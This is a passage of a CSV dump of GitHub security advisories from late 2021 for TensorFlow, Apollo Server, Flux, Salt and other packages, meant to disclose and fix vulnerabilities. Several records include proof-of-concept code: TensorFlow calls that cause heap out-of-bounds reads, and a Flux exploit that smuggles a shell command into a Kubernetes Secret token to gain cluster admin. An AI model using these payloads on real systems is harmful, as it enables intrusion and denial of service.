'https://nvd.nist.gov/vuln/detail/CVE-2021-43569'}, {'type': 'PACKAGE', 'url': 'https://github.com/starkbank/ecdsa-dotnet'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-dotnet/releases/tag/v1.3.2'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:26:13Z', 'nvd_published_at': '2021-11-09T22:15:00Z'}" +1.4.0,GHSA-374m-jm66-3vj8,2021-11-08T21:49:22Z,2021-11-10T18:41:47Z,,['CVE-2021-41226'],Heap OOB in `SparseBinCount`,"### Impact +The [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/bincount_op.cc#L353-L417) of `SparseBinCount` is vulnerable to a heap OOB: + +```python +import tensorflow as tf + + +tf.raw_ops.SparseBincount( + indices=[[0],[1],[2]] + values=[0,-10000000] + dense_shape=[1,1] + size=[1] + weights=[3,2,1] + binary_output=False) +``` + +This is because of missing validation between the elements of the `values` argument and the shape of the sparse output: + + +```cc +for (int64_t i = 0; i < indices_mat.dimension(0); ++i) { + const int64_t batch = indices_mat(i, 0); + const Tidx bin = values(i); + ... + out(batch, bin) = ...; +} +``` + +### Patches +We have patched the issue in GitHub commit [f410212e373eb2aec4c9e60bf3702eba99a38aba](https://github.com/tensorflow/tensorflow/commit/f410212e373eb2aec4c9e60bf3702eba99a38aba). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-374m-jm66-3vj8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41226'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f410212e373eb2aec4c9e60bf3702eba99a38aba'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:49:22Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-jcjx-c3j3-44pr,2021-11-08T21:09:02Z,2021-11-10T16:44:12Z,,[],Insufficient Session Expiration in @cyyynthia/tokenize,"### Impact +A bug introduced in version 1.1.0 made Tokenize generate faulty tokens with NaN as a generation date. As a result, tokens would not properly expire and remain valid regardless of the `lastTokenReset` field. + +### Patches +Version 1.1.3 contains a patch that'll invalidate these faulty tokens and make new ones behave as expected. + +### Workarounds +None. Tokens do not hold the necessary information to perform invalidation anymore. + +### References +PR #1 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [github.com/cyyynthia/tokenize](https://github.com/cyyynthia/tokenize) +* Email us at [cynthia@cynthia.dev](mailto:cynthia@cynthia.dev) +",[],"[{'package': {'ecosystem': 'npm', 'name': '@cyyynthia/tokenize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cyyynthia/tokenize/security/advisories/GHSA-jcjx-c3j3-44pr'}, {'type': 'PACKAGE', 'url': 'https://github.com/cyyynthia/tokenize'}]","{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:09:02Z', 'nvd_published_at': None}" +1.4.0,GHSA-pf7h-h2wq-m7pg,2022-07-05T22:05:39Z,2021-11-21T00:00:58Z,,['CVE-2021-21996'],Exposure of Resource to Wrong Sphere in salt,"An issue was discovered in SaltStack Salt before 3003.3. A user who has control of the source, and source_hash URLs can gain full file system access as root on a salt minion.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'salt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3003.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21996'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-pf7h-h2wq-m7pg'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/salt/PYSEC-2021-318.yaml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/11/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/11/msg00019.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6BUWUF5VTENNP2ZYZBVFKPSUHLKLUBD5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ACVT7M4YLZRLWWQ6SGRK3C6TOF4FXOXT/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MBAHHSGZLEJRCG4DX6J4RBWJAAWH55RQ/'}, {'type': 'WEB', 'url': 'https://saltproject.io/security_announcements/salt-security-advisory-2021-sep-02/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5011'}]","{'cwe_ids': ['CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2022-07-05T22:05:39Z', 'nvd_published_at': '2021-09-08T15:15:00Z'}" +1.4.0,GHSA-vfrc-ggmc-5jwv,2021-11-24T19:43:03Z,2021-11-23T17:55:46Z,,['CVE-2021-3950'],Cross-site Scripting in django-helpdesk,django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-helpdesk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3950'}, {'type': 'WEB', 'url': 'https://github.com/django-helpdesk/django-helpdesk/commit/04483bdac3b5196737516398b5ce0383875a5c60'}, {'type': 'PACKAGE', 'url': 'https://github.com/django-helpdesk/django-helpdesk'}, {'type': 'WEB', 'url': 'https://github.com/django-helpdesk/django-helpdesk/releases/tag/0.3.2'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4d7a5fdd-b2de-467a-ade0-3f2fb386638e'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:39:08Z', 'nvd_published_at': '2021-11-19T12:15:00Z'}" +1.4.0,GHSA-qm7x-rc44-rrqw,2021-11-04T19:46:00Z,2021-11-08T18:07:42Z,,[],Cross-site Scripting Vulnerability in GraphQL Playground (distributed by Apollo Server),"### Impact +In certain configurations, Apollo Server serves the client-side web app ""GraphQL Playground"" from the same web server that executes GraphQL operations. This web app has access to cookies and other credentials associated with the web server's operations. There is a cross-site scripting vulnerability in GraphQL Playground that allows for arbitrary JavaScript code execution in your web server's origin. If a user clicks a specially crafted link to your GraphQL Playground page served by Apollo Server, an attacker can steal cookies and other private browser data. + +Details of the underlying GraphQL Playground vulnerability are available in [this `graphql-playground` advisory](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7). (A [similar vulnerability](https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8) exists in the related `graphiql` project.) This advisory focuses on identifying whether *Apollo Server* installations are vulnerable and mitigating the vulnerability in Apollo Server; see the other advisories for details on the XSS vulnerability itself. + +The impact of this vulnerability is more severe if (as is common) your GraphQL server's origin URL is an origin that is used to store sensitive data such as cookies. + +In order for this vulnerability to affect your Apollo Server installation, it must actually serve GraphQL Playground. The integration between Apollo Server and GraphQL Playground is different in Apollo Server 2 and Apollo Server 3. You can tell which version of Apollo Server you are running by looking at the version of the [package from which you import the `ApolloServer` class](https://www.apollographql.com/docs/apollo-server/integrations/middleware/): this may be `apollo-server`, `apollo-server-express`, `apollo-server-lambda`, etc. + +#### Apollo Server 3 + +Apollo Server 3 does not serve GraphQL Playground by default. It has a [landing page plugin system](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/) and the default plugin is a simple splash page that is not vulnerable to this exploit, linking to Apollo Sandbox Explorer. (We chose to change the default because GraphQL Playground is not actively maintained.) + +If you are running Apollo Server 3, then you are *only* vulnerable if you *explicitly* import the [`ApolloServerPluginLandingPageGraphQLPlayground`](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/#graphql-playground-landing-page) plugin and pass it to your `ApolloServer`'s constructor in the `plugins` array. Otherwise, this advisory does not apply to your server. + +#### Apollo Server 2 + +Apollo Server 2 serves GraphQL Playground by default, unless the `NODE_ENV` environment variable is set to `production`, or if you explicitly configure it via the `playground` option to the `ApolloServer` constructor. + +Your Apollo Server 2 installation is vulnerable if *any* of the following is true: +- You pass `playground: true` to the `ApolloServer` constructor +- You pass some other object like `playground: {title: ""Title""}` to the `ApolloServer` constructor +- You do *not* pass any `playground` option to the `ApolloServer` constructor, *and* the `NODE_ENV` environment variable is *not* set to `production` + +#### Apollo Server 1 + +Apollo Server 1 included `graphiql` instead of `graphql-playground`. `graphiql` isn't automatically enabled in Apollo Server 1: you have to explicitly call a function such as `graphiqlExpress` to enable it. Because Apollo Server 1 is not commonly used, we have not done a detailed examination of whether the integration between Apollo Server 1 and `graphiql` is vulnerable to a similar exploit. If you are still using Apollo Server 1, we recommend you disable `graphiql` by removing the `graphiqlExpress` call, and then upgrade to a newer version of Apollo Server. + +### Patches and workarounds + +There are several approaches you can take to ensure that your server is not vulnerable to this issue. + +#### Upgrade Apollo Server + +The vulnerability has been patched in Apollo Server 2.25.3 and Apollo Server 3.4.1. To get the patch, upgrade your [Apollo Server entry point package](https://www.apollographql.com/docs/apollo-server/integrations/middleware/) to one of the fixed versions; this package may be `apollo-server`, `apollo-server-express`, `apollo-server-lambda`, etc. Additionally, if you depend directly on `apollo-server-core` in your `package.json`, make sure that you upgrade it to the same version. + +#### Upgrade Playground version only + +If upgrading to the latest version of Apollo Server 2 or 3 quickly will be challenging, you can configure your current version of Apollo Server to serve the latest version of the GraphQL Playground app. This will pin your app to serve a specific version of GraphQL Playground and you will not receive updates to it when you upgrade Apollo Server later, but this may be acceptable because GraphQL Playground is not actively maintained. + +The way to do this depends on what version of Apollo Server you're using and if you're already configuring GraphQL Playground. + +- **Apollo Server 3**: If you are using Apollo Server 3, then you are only vulnerable if your serve explicitly calls [`ApolloServerPluginLandingPageGraphQLPlayground`](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/#graphql-playground-landing-page) and passes it to the Apollo Server constructor in the `plugins` array. Add the option `version: '1.7.42'` to this call, so it looks like: +``` +plugins: [ApolloServerPluginLandingPageGraphQLPlayground({version: '1.7.42'})] +``` +- **Apollo Server 2 with no explicit `playground` option**: If you are using Apollo Server 2 and do not currently pass the `playground` option to `new ApolloServer`, add a `playground` option like so: +``` +new ApolloServer({ playground: process.env.NODE_ENV === 'production' ? false : { version: '1.7.42' } }) +``` +- **Apollo Server 2 with `playground: true` or `playground: {x, y, z}`**: If you are using Apollo Server 2 and currently pass `true` or an object to `new ApolloServer`, pass the `version` option under the `playground` option like so: +``` +new ApolloServer({ playground: { version: '1.7.42', x, y, z } }) +``` + +#### Disable GraphQL Playground + +If upgrading Apollo Server or GraphQL Playground is challenging, you can also disable GraphQL Playground. + +In Apollo Server 3, remove the call to `ApolloServerPluginLandingPageGraphQLPlayground` from your `ApolloServer` constructor's `plugins` array. This will replace GraphQL Playground with a simple splash page. See [the landing page plugins docs](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/) for details. + +In Apollo Server 2, add `playground: false` to your `ApolloServer` constructor: `new ApolloServer({ playground: false })`. This will replace GraphQL Playground with an attempt to execute a GraphQL operation, which will likely display an error in the browser. + +If you disable GraphQL Playground, any users who rely on it to execute GraphQL operations will need an alternative, such as the [Apollo Studio Explorer's account-free Sandbox](https://www.apollographql.com/docs/studio/explorer/#account-free-sandbox). + +### Credit + +This vulnerability was discovered by @Ry0taK. Thank you! + +The fix to GraphQL Playground was developed by @acao and @glasser with help from @imolorhe, @divyenduz, and @benjie. + + +### For more information +If you have any questions or comments about this advisory: +* Read the [`graphql-playground` advisory](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7) +* Open an issue in [the `apollo-server` repo](https://github.com/apollographql/apollo-server/) +* If the issue involves confidential information, email us at [security@apollographql.com](mailto:security@apollographql.com) +",[],"[{'package': {'ecosystem': 'npm', 'name': 'apollo-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.25.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'apollo-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/security/advisories/GHSA-qm7x-rc44-rrqw'}, {'type': 'PACKAGE', 'url': 'https://github.com/apollographql/apollo-server'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T19:46:00Z', 'nvd_published_at': None}" +1.4.0,GHSA-5629-8855-gf4g,2021-11-17T21:07:30Z,2021-11-18T20:12:40Z,,[],Authentication Bypass by CSRF Weakness ,"### Impact +The actual vulnerability has been discovered on `solidus_auth_devise`. See [GHSA-xm34-v85h-9pg2](https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2) for details. + +The security advisory here exists to provide an extra layer of security in the form of a monkey patch for users who don't update `solidus_auth_devise`. For this reason, it has been marked as low impact on this end. + +### Patches +For extra security, update `solidus_core` to versions `3.1.3`, `3.0.3` or `2.11.12`. + +### Workarounds +Look at the workarounds described at [GHSA-xm34-v85h-9pg2](https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2). + +### References +- [GHSA-xm34-v85h-9pg2](https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2). + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [solidus_auth_devise](https://github.com/solidusio/solidus_auth_devise/issues) or a discussion in [solidus](https://github.com/solidusio/solidus/discussions) +* Email us at [security@solidus.io](mailto:security@soliidus.io) +* Contact the core team on [Slack](http://slack.solidus.io/) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'solidus_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.12'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus/security/advisories/GHSA-5629-8855-gf4g'}, {'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'PACKAGE', 'url': 'https://github.com/solidusio/solidus'}]","{'cwe_ids': ['CWE-305', 'CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T21:07:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-q2cv-94xm-qvg4,2021-11-17T21:12:31Z,2021-11-15T23:18:00Z,,['CVE-2021-3921'],firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3921'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/47fa9e39561a9ec9e210e4023d090a7b33381684'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/724d3fd5-9f04-45c4-98d6-35a7d15468f5'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T21:06:10Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}" +1.4.0,GHSA-3v56-q6r6-4gcw,2021-11-08T21:04:44Z,2021-11-10T16:41:08Z,,['CVE-2021-41170'],Insecure Inherited Permissions in neoan3-apps/template,"### Impact +Versions prior 1.1.1 have allowed for passing in closures directly into the template engine. As a result values that are callable are executed by the template engine. The issue arises if a value has the same name as a method or function in scope and can therefore be executed either by mistake or maliciously. + +In theory all users of the package are affected as long as they either deal with direct user input or database values. A multi-step attack on is therefore plausible. + + +### Patches +Version 1.1.1 has addressed this vulnerability. +```php +$params = [ + 'reverse' => fn($input) => strrev($input), // <-- no longer possible with version ~1.1.1 + 'value' => 'My website' +] +TemplateFunctions::registerClosure('reverse', fn($input) => strrev($input)); // <-- still possible (and nicely isolated) +Template::embrace('

{{reverse(value)}}

', $params); +``` + +### Workarounds +Unfortunately only working with hardcoded values is safe in prior versions. As this likely defeats the purpose of a template engine, please upgrade. + +### References +As a possible exploit is relatively easy to achieve, I will not share steps to reproduce the issue for now. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [our repo](https://github.com/sroehrl/neoan3-template) + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'neoan3-apps/template'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sroehrl/neoan3-template/security/advisories/GHSA-3v56-q6r6-4gcw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41170'}, {'type': 'WEB', 'url': 'https://github.com/sroehrl/neoan3-template/issues/8'}, {'type': 'WEB', 'url': 'https://github.com/sroehrl/neoan3-template/commit/4a2c9570f071d3c8f4ac790007599cba20e16934'}, {'type': 'PACKAGE', 'url': 'https://github.com/sroehrl/neoan3-template'}]","{'cwe_ids': ['CWE-277', 'CWE-732', 'CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:04:44Z', 'nvd_published_at': '2021-11-08T19:15:00Z'}" +1.4.0,GHSA-35rf-v2jv-gfg7,2021-11-12T18:57:27Z,2021-11-15T17:35:33Z,,['CVE-2021-41254'],Privilege escalation to cluster admin on multi-tenant environments,"Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run `kubectl` commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges. + +### Impact + +Multitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue. + +### Exploit + +To exploit the command injection, first we create a secret with a shell command: + +```sh +kubectl create secret generic exploit-token --from-literal=token="" || kubectl api-versions"" +``` + +Then we create a Service Account that refers to the above Secret: + +```yaml +apiVersion: v1 +kind: ServiceAccount +metadata: + name: exploit + namespace: default +automountServiceAccountToken: false +secrets: +- name: exploit-token +``` + +And finally a Kustomization that runs under the above Service Account: + +```yaml +apiVersion: kustomize.toolkit.fluxcd.io/v1beta1 +kind: Kustomization +metadata: + name: exploit + namespace: default +spec: + interval: 5m + path: ""./deploy/"" + sourceRef: + kind: GitRepository + name: app + serviceAccountName: exploit +``` + +When kustomize-controller reconciles the above Kustomization, it will execute the shell command from the secret. + +### Patches + +This vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the `kubectl` binary has been removed from the container image. + +### Workarounds + +To prevent the creation of Kubernetes Service Accounts with `secrets` in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used. + +```yaml +apiVersion: kyverno.io/v1 +kind: ClusterPolicy +metadata: + name: restrict-sa +spec: + validationFailureAction: enforce + background: false + rules: + - name: validate-sa + match: + resources: + kinds: + - ServiceAccount + namespaces: + - tenant1 + - tenant2 + subjects: + - kind: User + name: some@tenant1.com + - kind: User + name: some@tenant2.com + - kind: ServiceAccount + name: kustomize-controller + namespace: flux-system + - kind: ServiceAccount + name: helm-controller + namespace: flux-system + validate: + message: ""Invalid service account"" + pattern: + X(secrets): ""*?"" +``` + +### References + +Disclosed by ADA Logics in a security audit of the Flux project sponsored by CNCF and facilitated by OSTIF. + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [kustomize-controller repository](http://github.com/fluxcd/kustomize-controller) + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/fluxcd/kustomize-controller'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41254'}, {'type': 'PACKAGE', 'url': 'https://github.com/fluxcd/kustomize-controller'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-12T18:57:27Z', 'nvd_published_at': '2021-11-12T18:15:00Z'}" +1.4.0,GHSA-3w5h-x4rh-hc28,2021-11-22T18:38:38Z,2021-11-23T18:18:25Z,,['CVE-2021-39231'],Exposure of sensitive information in Apache Ozone,"In Apache Ozone versions prior to 1.2.0, Various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from Datanode and Ozone manager and modify Ratis replication configuration.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39231'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C110cd117-75ed-364b-cd38-3effd20f2183%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/2'}]","{'cwe_ids': ['CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:38:38Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}" +1.4.0,GHSA-v935-pqmr-g8v9,2021-11-03T15:02:32Z,2021-11-03T17:36:04Z,,[],Unexpected panics in num-bigint,"### Impact + +Two scenarios were reported where `BigInt` and `BigUint` multiplication may unexpectedly panic. + +- The internal `mac3` function did not expect the possibility of non-empty all-zero inputs, leading to an `unwrap()` panic. +- A buffer was allocated with less capacity than needed for an intermediate result, leading to an assertion panic. + +Rust panics can either cause stack unwinding or program abort, depending on the application configuration. In some settings, an unexpected panic may constitute a denial-of-service vulnerability. + +### Patches +Both problems were introduced in version 0.4.1, and are fixed in version 0.4.3. + +### For more information +If you have any questions or comments about this advisory, please open an issue in the [num-bigint](https://github.com/rust-num/num-bigint) repo. + +### Acknowledgements +Thanks to Guido Vranken and Arvid Norberg for privately reporting these issues to the author. + +### References +* [GHSA-v935-pqmr-g8v9](https://github.com/rust-num/num-bigint/security/advisories/GHSA-v935-pqmr-g8v9) +* [num-bigint#228](https://github.com/rust-num/num-bigint/pull/228) +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'num-bigint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.1'}, {'fixed': '0.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rust-num/num-bigint/security/advisories/GHSA-v935-pqmr-g8v9'}, {'type': 'WEB', 'url': 'https://github.com/rust-num/num-bigint/pull/228'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-num/num-bigint'}]","{'cwe_ids': ['CWE-131', 'CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T15:02:32Z', 'nvd_published_at': None}" +1.4.0,GHSA-49rx-x2rw-pc6f,2021-11-08T22:43:35Z,2021-11-10T19:04:25Z,,['CVE-2021-41205'],Heap OOB read in all `tf.raw_ops.QuantizeAndDequantizeV*` ops,"### Impact +The [shape inference functions for the `QuantizeAndDequantizeV*` operations](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/array_ops.cc) can trigger a read outside of bounds of heap allocated array as illustrated in the following sets of PoCs: + +```python +import tensorflow as tf + +@tf.function +def test(): + data=tf.raw_ops.QuantizeAndDequantizeV4Grad( + gradients=[1.0,1.0], + input=[1.0,1.0], + input_min=[1.0,10.0], + input_max=[1.0,10.0], + axis=-100) + return data + +test() +``` + +```python +import tensorflow as tf + +@tf.function +def test(): + data=tf.raw_ops.QuantizeAndDequantizeV4( + input=[1.0,1.0], + input_min=[1.0,10.0], + input_max=[1.0,10.0], + signed_input=False, + num_bits=10, + range_given=False, + round_mode='HALF_TO_EVEN', + narrow_range=False, + axis=-100) + return data + +test() +``` + +```python +import tensorflow as tf + +@tf.function +def test(): + data=tf.raw_ops.QuantizeAndDequantizeV3( + input=[1.0,1.0], + input_min=[1.0,10.0], + input_max=[1.0,10.0], + signed_input=False, + num_bits=10, + range_given=False, + narrow_range=False, + axis=-100) + return data + +test() +``` + +```python +import tensorflow as tf + +@tf.function +def test(): + data=tf.raw_ops.QuantizeAndDequantizeV2( + input=[1.0,1.0], + input_min=[1.0,10.0], + input_max=[1.0,10.0], + signed_input=False, + num_bits=10, + range_given=False, + round_mode='HALF_TO_EVEN', + narrow_range=False, + axis=-100) + return data + +test() +``` + +In all of these cases, `axis` is a negative value different than the special value used for optional/unknown dimensions (i.e., -1). However, the code ignores the occurences of these values: + +```cc +... +if (axis != -1) { + ... + c->Dim(input, axis); + ... +} +``` + +### Patches +We have patched the issue in GitHub commit [7cf73a2274732c9d82af51c2bc2cf90d13cd7e6d](https://github.com/tensorflow/tensorflow/commit/7cf73a2274732c9d82af51c2bc2cf90d13cd7e6d). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick 